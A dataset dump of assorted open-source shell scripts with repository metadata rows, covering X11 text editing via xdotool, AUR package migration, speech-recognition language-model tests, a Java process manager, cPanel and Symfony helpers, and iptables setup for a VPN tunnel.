?) # arg is '?' when an unrecognized option is given
echo "Usage: external-edit [-s] [-e editor]"
echo "-s select"
echo "-e editor"
exit 1
;;
esac
done
# Send the "select all" key sequence appropriate for the focused application
# (C-x h for Emacs/Word, C-a elsewhere) via xte.
xte_selectall()
{
case $xwin_title in
*emacs@* | *Microsoft\ Word* )
xte <<EOF
sleep 1
keydown Control_L
key x
keyup Control_L
key h
EOF
;;
*)
xte <<EOF
sleep 1
keydown Control_L
key a
keyup Control_L
EOF
;;
esac
}
# Resolve the focused window id and its title.
xwin_id=`xdpyinfo | sed -ne 's/^focus:.*\(0x[^,]\+\).*/\1/p'`
if xwininfo -id $xwin_id | grep "(has no name)"
then
xwin_id=`printf "0x%x\n" $(( $xwin_id - 1 ))` #Decrement by one.
fi
xwin_title=`xwininfo -id $xwin_id | sed -ne 's/xwininfo: .*"\([^"]\+\)"/\1/p'`
if [ $sel ]; then
xte_selectall
fi
Wind_id=`xdotool getactivewindow`;
sleep 0.5
# URxvt: take the primary selection directly; otherwise copy (C-c) and read
# the clipboard. The sed escapes embedded double quotes for the elisp below.
if [ $(xdotool search --onlyvisible --class "URxvt" | grep -i $Wind_id) ]; then
word=$(xclip -selection primary -o | sed 's/[\"]/\\&/g')
else
xdotool keyup ctrl+c
xdotool key --clearmodifiers ctrl+c
word=$(xclip -selection clipboard -o | sed 's/[\"]/\\&/g')
fi
# run-or-raise.sh emacs
# Open a floating editor frame with the captured text inserted.
ELISP=$( cat $HOME/bin/emacs_anywhere.el )
$editor -a '' -c -F "((name . \"ec_float\")(top . -1))" -e "(progn $ELISP (insert \"$word\"))"
# /tmp/eaenv is written by the editor session; EA_ABORT signals "don't paste back".
. /tmp/eaenv
if [ "$EA_ABORT" = true ]; then
exit 0;
fi
# Refocus the original window and paste with the application's paste chord.
wmctrl -ia $xwin_id
Emacs_style='^.*(emacs@|Microsoft Word).*$'
if [[ $xwin_title =~ $Emacs_style ]]; then
xdotool keyup ctrl+y
xdotool key --clearmodifiers ctrl+y
else
xdotool keyup ctrl+v
xdotool key --clearmodifiers ctrl+v
fi
| true
|
eec1b818a481fa0aa4fcda663d7a45ed0301930e
|
Shell
|
gitter-badger/aur4migrate
|
/aur4_import.sh
|
UTF-8
| 1,117
| 3.859375
| 4
|
[] |
no_license
|
#!/bin/sh
# Split one package out of a combined AUR repository and push it to AUR 4.
# usage: ./aur4_import.sh <path/to/package>  (run from the repository root)
#
# FIX: the deprecated/ambiguous test operators -o and \( \) are replaced with
# chained [ ] || [ ], and the non-portable 'exit -1' (255 in bash, invalid in
# POSIX sh) is replaced with 'exit 1'.
if [ $# -lt 1 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then
echo "usage: $0 <path/to/package>"
echo "(has to be started from root of the existing repository)"
exit 1
fi
prefix=$1
pkg=`basename $prefix`
gitignore=`pwd`/gitignore-pkg
# create a new repository only for $pkg in the branch aur4/$pkg
echo git subtree split --prefix=\"$prefix\" -b aur4/$pkg
git subtree split --prefix="$prefix" -b aur4/$pkg || exit 1
# add/update .gitignore and .SRCINFO for every commit in the new branch
echo git filter-branch -f --tree-filter \
\"cp $gitignore .gitignore\; mksrcinfo\" -- aur4/$pkg
git filter-branch -f --tree-filter "cp $gitignore .gitignore; mksrcinfo" \
-- aur4/$pkg || exit 1
#ssh aur@aur4.archlinux.org setup-repo $pkg
# push the new branch to the repo on AUR 4
echo git push ssh+git://aur@aur4.archlinux.org/${pkg}.git/ aur4/$pkg:master
git push ssh+git://aur@aur4.archlinux.org/${pkg}.git/ aur4/$pkg:master \
|| exit 1
# delete the temporary branch
# the AUR 4 repository can be added as a submodule, see aur4_make_submodule.sh
echo git branch -D aur4/$pkg
git branch -D aur4/$pkg
| true
|
3b637a8b8877bb62d93a52983a0dea0f1d9390a3
|
Shell
|
JessedeDoes/LMServer
|
/scripts/newTestsParagraphDecoder.sh
|
UTF-8
| 5,578
| 2.734375
| 3
|
[] |
no_license
|
# Lattice-decoding experiments for the Bentham HTR data: each numbered set
# (LMn/DICn/LATn/TEMPn) pairs an n-gram language model and dictionary with a
# lattice directory and a scratch directory.
BFB=/datalokaal/Scratch/HTR/BFBNew
UNI=$BFB/LanguageModels/Unigram/
LM1=$UNI/languageModel.lm
DIC1=$UNI/dictionary.txt
LAT1=$BFB/StoredExperiments/experimentWithUnigramModel/resultados/res-128gauss/
TEMP1=Temp/Temp1
DIR2=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/2-gram/FinalInDomainBentham/OneLineINBentham/
DIC2=$DIR2/dictionary.txt
LM2=$DIR2/languageModel.lm
LAT2=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/2-gram/FinalInDomainBentham/OneLineINBentham/resultados/res-128gauss/
TEMP2=Temp/Temp2
LAT2a=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/CoTrainingSingelIterationNewCharacterSet/OneLineECCO/intOneLine/resultados/res-128gauss/
DIR2a=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/CoTrainingSingelIterationNewCharacterSet/OneLineECCO/intOneLine/
LM2a=$DIR2a/interpolatedLM.lm
DIC2a=$DIR2a/dictionary.txt
TEMP2a=Temp/Temp2a
DIR3=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/3-gram-oneline
LM3=$DIR3/int/interpolatedLM.lm
DIC3=$DIC2a
LAT3=$LAT2a
TEMP3=Temp/Temp3
DIR4=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/4-gram-oneline
LM4=$DIR4/int/interpolatedLM.lm
DIC4=$DIC2a
LAT4=$LAT2a
TEMP4=Temp/Temp4
DIR5=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/5-gram-oneline
LM5=$DIR5/int/interpolatedLM.lm
DIC5=$DIC2a
LAT5=$LAT2a
TEMP5=Temp/Temp5
# Decode the lattices with the given LM/dictionary, build case-sensitive and
# case-insensitive result files, and report WER via tasas.
# NOTE(review): this function is named 'test', shadowing the shell builtin of
# the same name within this script; it also assigns the globals LM1/DIC1/LAT1
# (no 'local'), clobbering the Test-1 settings — harmless only because Test 1
# runs first.
test()
{
# positional args: $1 = LM, $2 = dictionary, $3 = lattice dir, $4 = scratch dir
LM1=$1
DIC1=$2
LAT1=$3
TEMP=$4
echo "testing $LM1 $DIC1 $LAT1"
java -cp ./bin/ eu.transcriptorium.lattice.LatticeListDecoder $LM1 $DIC1 $LAT1 > $TEMP/listDecoder.1.out 2>$TEMP/decoder.log
perl scripts/makeResultsFileFrom1BestResult.pl $TEMP/listDecoder.1.out > $TEMP/listDecoder.result.1.cs
perl scripts/makeResultsFileFrom1BestResult.pl -i $TEMP/listDecoder.1.out > $TEMP/listDecoder.result.1.ci
# Strip trailing '#…' annotations before scoring.
perl -pe 's/\s*#.*//' $TEMP/listDecoder.result.1.cs > $TEMP/listDecoder.result.cs
perl -pe 's/\s*#.*//' $TEMP/listDecoder.result.1.ci > $TEMP/listDecoder.result.ci
CIWER=`tasas $TEMP/listDecoder.result.ci -ie -f "$" -s " "`
CSWER=`tasas $TEMP/listDecoder.result.cs -ie -f "$" -s " "`
DETAILS=`bash scripts/tasasWithOptions.sh $TEMP/listDecoder.result.cs`
DETAILSCI=`bash scripts/tasasWithOptions.sh $TEMP/listDecoder.result.ci`
echo "CS: $CSWER, CI: $CIWER, DETAILS: $DETAILS, DETAILSCI: $DETAILSCI"
}
echo "Test 1"
test $LM1 $DIC1 $LAT1 $TEMP1
echo "Test 2"
test $LM2 $DIC2 $LAT2 $TEMP2
echo "Test 2 adapted"
test $LM2a $DIC2a $LAT2a $TEMP2a
echo "Test 3 adapted"
test $LM3 $DIC3 $LAT3 $TEMP3
echo "Test 4 adapted"
test $LM4 $DIC4 $LAT4 $TEMP4
echo "Test 5 adapted"
test $LM5 $DIC5 $LAT5 $TEMP5
#
# without alejandro weighting
# Test 1 (unigram)
# CS: 24.555160, CI: 23.640061
# Test 2 (bigram in-domain)
# CS: 22.191154, CI: 21.174377
# Test 2 adapted (bigram adapted)
# CS: 17.577529, CI: 16.662430
# Test 3 adapted (trigram adapted)
# CS: 16.611591, CI: 15.645653
#
# with alejandro weighting
# Test 1
# CS: 24.300966, CI: 23.512964
# Test 2
# CS: 22.000508, CI: 21.098119
# Test 2 adapted
# CS: 17.463142, CI: 16.637011
# Test 3 adapted
# CS: 16.535333, CI: 15.683782
#
# comparison with non-paragraph results:
#
# Test 1 24.631418
# Test 2 22.572445
# Test 2a 18.734113
# Test 3 (ci) 15.976106
#
#
# Test 1
# CS: 24.300966, CI: 23.512964, DETAILED: all words: 24.389934; first: 29.767442; withoutfirst: 23.715753; last: 31.511628; without last: 23.601598; without both: 22.819978; without both,ci,nopunct: 16.719835
# Test 2
# CS: 22.000508, CI: 21.098119, DETAILED: all words: 22.089476; first: 26.860465; withoutfirst: 21.461187; last: 28.837209; without last: 21.418379; without both: 20.619881; without both,ci,nopunct: 15.331207
# Test 2 adapted
# CS: 17.463142, CI: 16.637011, DETAILED: all words: 17.552110; first: 24.883721; withoutfirst: 16.595320; last: 24.767442; without last: 16.738014; without both: 15.609443; without both,ci,nopunct: 9.382623
# Test 3 adapted
# CS: 16.535333, CI: 15.683782, DETAILED: all words: 16.624301; first: 23.720930; withoutfirst: 15.667808; last: 25.116279; without last: 15.639269; without both: 14.549542; without both,ci,nopunct: 8.425596
#
#
# with context length depending on LM
# Test 1
# CS: 24.288256, CI: 23.500254, DETAILED: all words: 24.288256; first: 29.767442; withoutfirst: 23.687215; last: 31.511628; without last: 23.501712; without both: 22.803918; without both,ci,nopunct: 16.719835
# Test 2
# CS: 21.962379, CI: 21.098119, DETAILED: all words: 21.962379; first: 26.860465; withoutfirst: 21.404110; last: 28.720930; without last: 21.318493; without both: 20.603822; without both,ci,nopunct: 15.387502
# Test 2 adapted
# CS: 17.336045, CI: 16.535333, DETAILED: all words: 17.336045; first: 24.534884; withoutfirst: 16.481164; last: 24.534884; without last: 16.538242; without both: 15.529147; without both,ci,nopunct: 9.345093
# Test 3 adapted
# CS: 16.535333, CI: 15.683782, DETAILED: all words: 16.535333; first: 23.720930; withoutfirst: 15.653539; last: 25.116279; without last: 15.539384; without both: 14.533483; without both,ci,nopunct: 8.425596
# Test 4 adapted
# CS: 16.522623, CI: 15.645653, DETAILED: all words: 16.522623; first: 23.720930; withoutfirst: 15.710616; last: 24.534884; without last: 15.596461; without both: 14.661956; without both,ci,nopunct: 8.575718
# Test 5 adapted
# CS: 16.942044, CI: 16.052364, DETAILED: all words: 16.942044; first: 24.534884; withoutfirst: 16.038813; last: 24.767442; without last: 16.010274; without both: 14.983138; without both,ci,nopunct: 8.725840
#
| true
|
c97e13b32be395653d651dfa5840030b1ee783c2
|
Shell
|
jackdwyer/statusboard
|
/contrib/start_statusboard_kiosk.sh
|
UTF-8
| 319
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
# Start the status board in Chrome kiosk mode, waiting for connectivity first.
TIMEOUT=30

# One ping decides whether the network is up.
if ping -c 1 yahoo.com &>/dev/null; then
  notify-send "have wifi, starting.."
else
  notify-send "sleeping ${TIMEOUT}s; no wifi"
  sleep ${TIMEOUT}s
fi

google-chrome-stable --incognito --kiosk http://localhost:8080/ &
| true
|
6c929bb74205b6d44f1b469b12f69356a098e090
|
Shell
|
VerKnowSys/svdOS
|
/etc/rc.svdsysup
|
UTF-8
| 346
| 2.859375
| 3
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
#
# ServeD system script to perform lockless filesystem binary updates
stty status '^T' 2> /dev/null
# Set shell to ignore SIGINT (2), but not children;
# shell catches SIGQUIT (3) and returns to single user.
trap : 2
trap "echo 'Update interrupted'; exit 1" 3
# BUG FIX: the original used 'exec', which replaced this shell and made the
# completion message (and the traps' interrupt handling) unreachable; run the
# updater as a child process instead.
"/etc/rc.svdsysup.sh"
printf '\n\n%s\n' "Update complete."
exit 0
| true
|
5b3c89e3cfce540956c3e8dfa21cb47e69715ac6
|
Shell
|
NatsumeWeiXia/videosearch
|
/indexer/global_descriptors/run_shot_based_index_mode_1_test.sh
|
UTF-8
| 1,076
| 3.609375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash -e
# Build a shot-based global-descriptor index (mode 1) for every keyframe list
# found under ../test_db.

# Get list of keyframe lists
KEYFRAMES_LISTS=test_keyframe_lists.txt
ls ../test_db/*.txt > "$KEYFRAMES_LISTS"

# Parameters for index
GDINDEX_PATH=trained_parameters
CENTROIDS=512
LD_MODE=0
VERBOSE=1
if [ "$LD_MODE" -eq 0 ]; then
    LD_NAME=sift
elif [ "$LD_MODE" -eq 1 ]; then
    LD_NAME=siftgeo
else
    echo "Unrecognized LD_NAME"
    # BUG FIX: a bare 'exit' here returned 0 (echo's status); fail explicitly.
    exit 1
fi

# Shot parameters
SHOT_MODE=1
SHOT_KEYF=-1
SHOT_THRESH=0.8

# Loop over each video and get shot-based index for each of them.
# (read the list file line by line instead of word-splitting `cat` output)
while IFS= read -r list; do
    # Get shot file
    shot_res_file=${list%.txt}.shot_t$SHOT_THRESH
    # Compose output index name
    out_index=${list%.txt}.${LD_NAME}_scfv_idx_k${CENTROIDS}_shot_t${SHOT_THRESH}_n${SHOT_KEYF}_m${SHOT_MODE}
    # Command line ($cmd is intentionally expanded unquoted below so it
    # re-splits into words when executed)
    cmd=$(echo time \
        ./index_dataset \
        -i $list \
        -o $out_index \
        -r $GDINDEX_PATH \
        -c $CENTROIDS \
        -l $LD_MODE \
        -v $VERBOSE \
        -m $SHOT_MODE \
        -k $SHOT_KEYF \
        -s $shot_res_file)
    # Write and execute command
    echo $cmd
    $cmd
done < "$KEYFRAMES_LISTS"
| true
|
c0b3bc9cfbeec77671f7d8056e3da46280450022
|
Shell
|
alexandroskoliousis/co347
|
/src/sysmanager.sh
|
UTF-8
| 3,164
| 3.890625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# ./sysmanager.sh [start|stop|clear]
#
# Copyright (c) 2013-2014, Imperial College London
# All rights reserved.
#
# Distributed Algorithms, CO347
#
PIDDIR="`pwd`/pids"
VERBOSE=true
# If true, stdout is redirected to
# log files, one per process.
LOG=true
USAGE="./sysmanager.sh [start|stop|clear] [class] [#instances] [topology]"
daemonize () {
name=$1
# The name of a process occurs twice;
# the first occurence is used for the
# .pid file.
shift 1
(
[[ -t 0 ]] && exec 0</dev/null
if $LOG; then
[[ -t 1 ]] && exec 1>"`pwd`"/${name}.out
fi
# Always redirect stderr to a file.
[[ -t 2 ]] && exec 2>"`pwd`"/${name}.err
# close non-standard file descriptors
eval exec {3..255}\>\&-
trap '' 1 2 # ignore HUP INT in child process
exec "$@"
) &
pid=$!
disown -h $pid
$VERBOSE && echo "[DBG] ${name}'s pid is ${pid}"
echo $pid > "${PIDDIR}"/${name}.pid
return 0
}
check () {
name=$1
$VERBOSE && echo "[DBG] checking ${name}"
# Check if process $name is running
[ -s "${PIDDIR}"/$name.pid ] && (
$VERBOSE && echo "[DBG] ${name}.pid found"
pid=`cat "${PIDDIR}"/$name.pid`
ps -p $pid &>/dev/null
return $?
)
}
# Launch $N daemonized instances of Java class $P, named P1..PN.
# Any extra arguments ("$@") are appended to each process command line.
start () {
    $VERBOSE && echo "[DBG] start ${N} instances of class ${P}"
    i=1
    while [ $i -le $N ]; do
        name="P${i}"
        # You can append arguments args[3], args[4],
        # and so on after ${N}.
        daemonize ${name} java ${P} ${name} ${i} ${N} $@
        let i++
    done
}
# Remove all pid files and the pid directory, then delete empty .err logs.
# NOTE(review): this function shadows the "clear" terminal command for
# the rest of the script -- presumably intentional.
clear () {
    $VERBOSE && echo "[DBG] clear"
    [ -d "${PIDDIR}" ] && rm -f "${PIDDIR}"/*.pid
    rm -rf "${PIDDIR}"
    # Delete empty *.err files
    ls *.err &>/dev/null
    if [ $? -eq 0 ]; then
        files=`ls *.err`
        for f in $files; do
            [ ! -s $f ] && rm -f $f
        done
    fi
}
# Kill (SIGKILL) every process recorded in ${PIDDIR}/*.pid, then clean up.
stop () {
    $VERBOSE && echo "[DBG] stop"
    [ ! -d "${PIDDIR}" ] && return 0   # nothing was ever started
    ls "${PIDDIR}"/*.pid &>/dev/null
    if [ $? -eq 0 ]; then
        for f in "${PIDDIR}"/*.pid; do
            pid=`cat "$f"`
            $VERBOSE && echo "[DBG] pid is $pid"
            kill -9 $pid &>/dev/null
            rm -f "$f"
        done
    fi
    clear # delete $PIDDIR.
}
#
# main ($1) ($2) ($3) (...)
#
# Validate the command line before dispatching:
#   $1 = command (start|stop|clear), $2 = class, $3 = #instances,
#   $4 = topology file; anything after $4 is forwarded to each process.
if [ $# -lt 1 ]; then
    echo $USAGE && exit 1
else
    if [ $1 == "start" ]; then
        if [ $# -lt 4 ]; then # Check number of arguments.
            echo $USAGE
            exit 1
        fi
        if [ ! -f "$2.class" ]; then # Check program name.
            echo "error: $2.class not found"
            exit 1
        fi
        # Check number of processes.
        [ $3 -eq $3 ] >/dev/null 2>&1   # numeric probe: -eq errors on non-integers
        if [ $? -eq 1 ]; then
            echo "error: invalid argument ($3)"
            exit 1
        fi
        if [ $3 -le 0 ]; then
            echo "error: invalid argument ($3)"
            exit 1
        fi
        if [ ! -f "$4" ]; then # Check if topology file exists.
            echo $USAGE
            exit
        fi
    elif [ $# -ne 1 ]; then
        echo $USAGE
        exit 1
    fi
fi
C=$1 # start, stop, or clear
P=$2 # class name
N=$3 # #instances
F=$4 # network filename
shift 4
# Arguments 4, 5, 6, ... are passed to the process when it starts.
case ${C} in
    "start")
        [ -d "${PIDDIR}" ] || mkdir -p "${PIDDIR}"
        # To begin with, start Registrar
        check "P0"
        if [ $? -eq 0 ]; then
            echo "error: Registrar already running"
            exit 1
        fi
        daemonize "P0" java Registrar $N $F
        sleep 1   # give the Registrar a head start before the workers
        start $@ ;;
    "stop" )
        stop ;;
    "clear")
        clear;;
    *)
        echo $USAGE
        exit 1
esac
exit 0
| true
|
eeb6682050affae567818451622e141363b20892
|
Shell
|
GitoriousLispBackup/seainit
|
/start-seainit.sh
|
UTF-8
| 571
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/sh
# Run the seainit servers.
# Assumes the seainit servers live in /sea/seainit-servers/ and that SBCL
# is installed and reachable via $PATH.
seainit_server_directory="/sea/seainit-servers"
seainit_log="/sea/log/seainit-log"
# Locate SBCL; fail early with a clear message instead of exec'ing "".
# (command -v is the portable replacement for `which`.)
sbcl_path=$(command -v sbcl) || { echo "start-seainit: sbcl not found in PATH" >&2; exit 1; }
# Change to the directory, so that the daemons can all see each other.
cd "$seainit_server_directory" || exit 1
# Start the bootstrap server:
"$sbcl_path" --noinform --no-userinit --non-interactive --load "$seainit_server_directory/seainit-bootstrap.lsp" #&> $seainit_log;
# Now sleep indefinitely (keeps a foreground process for supervisors).
while true; do sleep 60; done
| true
|
54fa12505b6b55e88066965ad50bc13015d61a79
|
Shell
|
echoe/cpcli
|
/cpcli.sh
|
UTF-8
| 5,671
| 3.609375
| 4
|
[] |
no_license
|
#cpanel CLI simplification script for doing things in the CLI that you would rather not have to do in cPanel
#Version 0.04
# Fixes in this review pass:
#   - "ip" group renamed changeip -> chgip so the menu matches the handler
#   - mysql createdb now runs uapi as the owning cPanel user, not the db name
#   - mysql createusr passes password=$specify2 (the "$" was missing)
#   - mysql deletedb no longer invokes "uapi uapi"
#   - mysql delete-user handler matches the advertised "deleteusr" keyword
#Declare our variables!
process=$1
group=$2
specify1=$3
specify2=$4
specify3=$5
specify4=$6
#These arrays are for the help process so people can figure out what is available.
arrayprocess=(mysql email ip);
arraygroupmysql=(chgpasswd createdb createusr deletedb deleteusr setusrprivs showdbs showusrs);
arraygroupemail=(createacct deleteacct chgmx chgpasswd);
arraygroupip=(chgip)
arrayspecifymysqlchgpasswd=(mysqldbusr passwd);
arrayspecifymysqlcreatedb=(dbname);
arrayspecifymysqlcreateusr=(usrname passwd);
arrayspecifymysqldeletedb=(dbname);
arrayspecifymysqldeleteusr=(mysqlusr);
arrayspecifymysqlsetusrprivs=(mysqlusr dbname "ALL PRIVILEGES");
arrayspecifymysqlshowdbs=();
arrayspecifymysqlshowusrs=();
arrayspecifyemailcreateacct=(email@domain.com passwd);
arrayspecifyemaildeleteacct=(email@domain.com);
arrayspecifyemailchgmx=(domain mxtype);
arrayspecifyemailchgpasswd=(email@domain.com passwd);
arrayspecifyipchgip=(domain newip);
#This is what controls our help, it's the meat of the program and will list the arrays above as needed.
#NOTE(review): validation uses substring grep, so e.g. "db" is accepted
#because it appears inside "createdb" -- confirm this is acceptable.
if [[ -z $process ]]; then process="notaprocess"; fi
while [[ -z `echo ${arrayprocess[*]} "help" | grep $process` ]]; do echo "Please type one of: help ${arrayprocess[*]}"; read process; done
if [[ $process == "help" ]]; then
    if [[ -z $group ]]; then group="notagroup"; fi
    while [[ -z `echo ${arrayprocess[*]} | grep $group` ]]; do
        echo "Hello! This is a bash script that makes some cPanel CLI commands easier to run."
        echo "You can type one of these: ${arrayprocess[*]} and this script will give you the options for that group.";
        read group;
    done
    if [[ -z $specify1 ]]; then
        specify1="notspecify1";
        arrayname=arraygroup$group[@];
        echo "The options for $group are ${!arrayname}";
        echo "Type one of those to learn about what exactly that needs.";
        while [[ -z `echo ${!arrayname} | grep $specify1` ]]; do echo "Please type one of ${!arrayname}"; read specify1; done
    fi
    arrayname=arrayspecify$group$specify1[@];
    echo "For $group $specify1, you'll need to provide ${!arrayname} in order, like this:";
    echo " ./cpcli.sh $group $specify1 ${!arrayname} ";
    exit 1
fi
if [[ -z $group ]]; then group="notagroup"; fi
arrayname=arraygroup$process[@];
while [[ -z `echo ${!arrayname} | grep $group` ]]; do echo "Please type one of ${!arrayname}"; read group; done
if [[ $specify1 == "" ]]; then
    arrayname=arrayspecify$process$group[@];
    echo "If you want to use a random password, you can use this:" `tr -cd '[:alnum:]!@#$%^&*()<>?' < /dev/urandom | fold -w20 | head -n1`
    echo "Now fill out all of ${!arrayname} one at a time (press return after each option selected) in this order:";
    echo ${!arrayname};
    numoptions=`echo ${!arrayname} | wc -w`
    if [ $numoptions -gt 0 ]; then read specify1; fi
    if [ $numoptions -gt 1 ]; then read specify2; fi
    if [ $numoptions -gt 2 ]; then read specify3; fi
    if [ $numoptions -gt 3 ]; then read specify4; fi
fi
#This bit actually runs the processes. If statements, ahoy.
if [[ $process == "mysql" ]]; then
    if [[ $group == "chgpasswd" ]]; then
        tempuser=$(ls /var/cpanel/users | grep `echo $specify1 | cut -d"_" -f1`);
        uapi --user=$tempuser Mysql set_password user=$specify1 password=$specify2
    fi
    if [[ $group == "createdb" ]]; then
        tempuser=$(ls /var/cpanel/users | grep `echo $specify1 | cut -d"_" -f1`);
        # FIX: run as the owning cPanel account, not as the database name
        uapi --user=$tempuser Mysql create_database name=$specify1
    fi
    if [[ $group == "createusr" ]]; then
        tempuser=$(ls /var/cpanel/users | grep `echo $specify1 | cut -d"_" -f1`);
        # FIX: the "$" was missing, so the literal word "specify2" was the password
        uapi --user=$tempuser Mysql create_user name=$specify1 password=$specify2
    fi
    if [[ $group == "deletedb" ]]; then
        tempuser=$(ls /var/cpanel/users | grep `echo $specify1 | cut -d"_" -f1`);
        # FIX: dropped the duplicated "uapi uapi"
        uapi --user=$tempuser Mysql delete_database name=$specify1
    fi
    if [[ $group == "deleteusr" ]]; then
        # FIX: was "deleteuser", which the menu ("deleteusr") never produces
        tempuser=$(ls /var/cpanel/users | grep `echo $specify1 | cut -d"_" -f1`);
        uapi --user=$tempuser Mysql delete_user name=$specify1
    fi
    if [[ $group == "setusrprivs" ]]; then
        tempuser=$(ls /var/cpanel/users | grep `echo $specify1 | cut -d"_" -f1`);
        uapi --user=$tempuser Mysql set_privileges_on_database user=$specify1 database=$specify2 privileges=$specify3
    fi
    if [[ $group == "showusrs" ]]; then
        mysql -e "select distinct user from mysql.user"
    fi
    if [[ $group == "showdbs" ]]; then
        mysql -e "show databases"
    fi
fi
if [[ $process == "email" ]]; then
    if [[ $group == "createacct" ]]; then
        tempdomain=`echo $specify1 | cut -d'@' -f2`;
        tempuser=`/scripts/whoowns $tempdomain`;
        uapi --user=$tempuser Email add_pop email=$specify1 password=$specify2 skip_update_db=1
    fi
    if [[ $group == "deleteacct" ]]; then
        tempdomain=`echo $specify1 | cut -d'@' -f2`;
        tempuser=`/scripts/whoowns $tempdomain`;
        uapi --user=$tempuser Email delete_pop email=$specify1
    fi
    if [[ $group == "chgmx" ]]; then
        tempuser=`/scripts/whoowns $specify1`;
        exchanger=`uapi --user=$tempuser Email list_mxs domain=$specify1 |grep domain | sed 's/ //g' | cut -d: -f2 | head -n1`;
        uapi --user=$tempuser Email change_mx domain=$specify1 alwaysaccept=$specify2 exchanger=$exchanger oldexchanger=$exchanger;
    fi
    if [[ $group == "chgpasswd" ]]; then
        tempdomain=`echo $specify1 | cut -d'@' -f2`;
        tempuser=`/scripts/whoowns $tempdomain`;
        uapi --user=$tempuser Email passwd_pop email=$specify1 password=$specify2 domain=$tempdomain
    fi
fi
if [[ $process == "ip" ]]; then
    if [[ $group == "chgip" ]]; then
        /usr/local/cpanel/bin/setsiteip $specify1 $specify2
    fi
fi
| true
|
1c9a50c88fbdf490d9867f7131dc99d5cb13f3a1
|
Shell
|
sofwerx/tegola-mobile
|
/android/TMControllerSvcLib/TMControllerSvc/src/main/tegola-bin-buildscripts/linux/clean_tegola_android_all.sh
|
UTF-8
| 662
| 3.296875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Usage: clean_tegola_android_all <accepts no arguments!>
# Cleans the tegola build outputs for every supported Android platform.
# BUG FIX: removed the stray Windows-batch lines "@echo off" and
# "setlocal" -- they are not shell commands and only produced
# "command not found" errors here.
SRC_MAIN_DIR=${MY_ANDROID_STUDIO_WORKSPACE}/src/github.com/terranodo/tegola-mobile/android/TMControllerSvcLib/TMControllerSvc/src/main
REQUIRED_ARGS="-b_version_props_copy_path \"${SRC_MAIN_DIR}/assets\" -b_normalized_fn_bin_output_path \"${SRC_MAIN_DIR}/res/raw\""
t_platform=(android-arm android-arm64 android-x86 android-x86_64)
for index in ${!t_platform[*]} ; do
    echo clean_tegola_android_all.sh: Cleaning tegola android-platform build: ${t_platform[$index]}
    eval "./clean_tegola.sh -t_platform ${t_platform[$index]} $REQUIRED_ARGS"
    echo
done
| true
|
f3fff00f780c2964937567ef70247ffa9167710a
|
Shell
|
TangoMan75/bash_aliases
|
/src/symfony/sf-dump-server.sh
|
UTF-8
| 1,407
| 4.03125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash

## Start project debug server
function sf-dump-server() {
    local CONSOLE
    local ARGUMENTS=()
    local OPTARG
    local OPTION

    # Parse options; only -h (help) is recognised, everything else is
    # collected as a positional argument.
    while [ "$#" -gt 0 ]; do
        OPTIND=0
        while getopts :h OPTION; do
            case "${OPTION}" in
                h) echo_warning 'sf-dump-server';
                    echo_label 14 ' description:'; echo_primary 'Start project debug server'
                    echo_label 14 ' usage:'; echo_primary 'sf-server-dump'
                    return 0;;
                \?) echo_error "invalid option \"${OPTARG}\""
                    return 1;;
            esac
        done
        if [ "${OPTIND}" -gt 1 ]; then
            shift $(( OPTIND-1 ))
        fi
        if [ "${OPTIND}" -eq 1 ]; then
            ARGUMENTS+=("$1")
            shift
        fi
    done

    if [ "${#ARGUMENTS[@]}" -gt 1 ]; then
        echo_error "too many arguments (${#ARGUMENTS[@]})"
        echo_label 8 'usage:'; echo_primary 'sf-server-dump'
        return 1
    fi

    # find correct console executable
    if [ -x ./app/console ]; then
        CONSOLE=./app/console
    elif [ -x ./bin/console ]; then
        CONSOLE=./bin/console
    else
        echo_error 'no symfony console executable found'
        return 1
    fi

    # BUG FIX: the PHP ini directive is "memory_limit" (underscore);
    # "-d memory-limit=-1" was silently ignored by PHP, so the memory
    # limit was never lifted.
    echo_info "php -d memory_limit=-1 ${CONSOLE} server:dump --env=dev"
    php -d memory_limit=-1 ${CONSOLE} server:dump --env=dev
}
| true
|
aa81710e669b60844d2a9f30bcf8030aa8da781e
|
Shell
|
addisonbair/kubernetes-aws
|
/vpn-gateway/vpn-tunnel
|
UTF-8
| 3,474
| 4.09375
| 4
|
[] |
no_license
|
#!/bin/bash
#
# chkconfig: - 24 76
#
# Description: Basic script to open VPN tunnel and create route for entire VPC
# Path variables
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# VPN Variables
VPN_TUNN="tun0"
VPN_USER="user"
VPN_HOST="connect.everyonecounts.com"
VPN_PASS="pass"
PID="/var/run/openconnect.pid"
TEMP_LOG="/tmp/status.txt"
INFO="
Usage: $(basename "$0") (start|stop|status|restart)
"
# IPtables
VPC_CIDR="172.16.0.0/16"
# Establish routing rules to set up VPN/NAT tunnel
# Establish routing rules to set up VPN/NAT tunnel.
# BUG FIX: the original flushed the filter table twice under two
# near-identical comments; one flush/delete-chain pass is enough.
function exec_iptables(){
    # Flush all the rules in the IPfilter, nat and mangle tables
    /sbin/iptables --flush
    /sbin/iptables --delete-chain
    /sbin/iptables --table nat --flush
    /sbin/iptables --table nat --delete-chain
    /sbin/iptables --table mangle --flush
    /sbin/iptables --table mangle --delete-chain
    # Setup postrouting rules: NAT the VPC traffic out of the tunnel/eth0
    /sbin/iptables -A POSTROUTING -t nat -o "$VPN_TUNN" -j MASQUERADE
    /sbin/iptables -A POSTROUTING -t nat -s "$VPC_CIDR" -o eth0 -j MASQUERADE
    ### ALLOW - VPC CIDR
    /sbin/iptables -A INPUT -p all -s "$VPC_CIDR" -j ACCEPT
}
